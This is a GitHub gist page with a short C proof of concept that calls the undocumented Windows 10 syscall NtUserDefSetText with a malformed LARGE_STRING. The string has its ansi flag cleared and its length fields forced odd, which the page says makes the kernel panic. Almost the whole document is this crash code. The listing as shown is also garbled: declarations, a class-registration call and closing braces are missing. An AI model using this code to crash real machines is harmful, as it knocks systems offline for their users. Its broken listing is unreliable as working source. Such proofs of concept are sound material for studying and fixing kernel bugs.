Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
NtUserDefSetText() in Windows 10 will panic if you set the ansi flag incorrectly.
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "user32")
#pragma comment(lib, "gdi32")
typedef struct _LARGE_STRING {
ULONG Length;
ULONG MaximumLength:31;
ULONG bAnsi:1;
PVOID Buffer;
static CHAR kWindowText[32] = "Hello World";
int main(int argc, char **argv) {
FARPROC NtUserDefSetText = GetProcAddress(LoadLibrary("WIN32U"), "NtUserDefSetText");
WNDCLASSEX WindowClass = {0};
HWND Window;
.Length = sizeof kWindowText,
.MaximumLength = sizeof kWindowText,
.bAnsi = FALSE,
.Buffer = kWindowText,
// This string has bAnsi set to FALSE, so an odd Length is impossible (must be a count of WCHARs)
// Unless you set the flag incorrectly..
DefText.MaximumLength |= 1;
DefText.Length |= 1;
WindowClass.cbSize = sizeof(WNDCLASSEX);
WindowClass.lpfnWndProc = DefWindowProc;
WindowClass.hInstance = GetModuleHandle(NULL);
WindowClass.lpszClassName = "Class";
Window = CreateWindowEx(0, "Class", "Window", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, GetModuleHandle(NULL), NULL);
NtUserDefSetText(Window, &DefText);
return 1;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment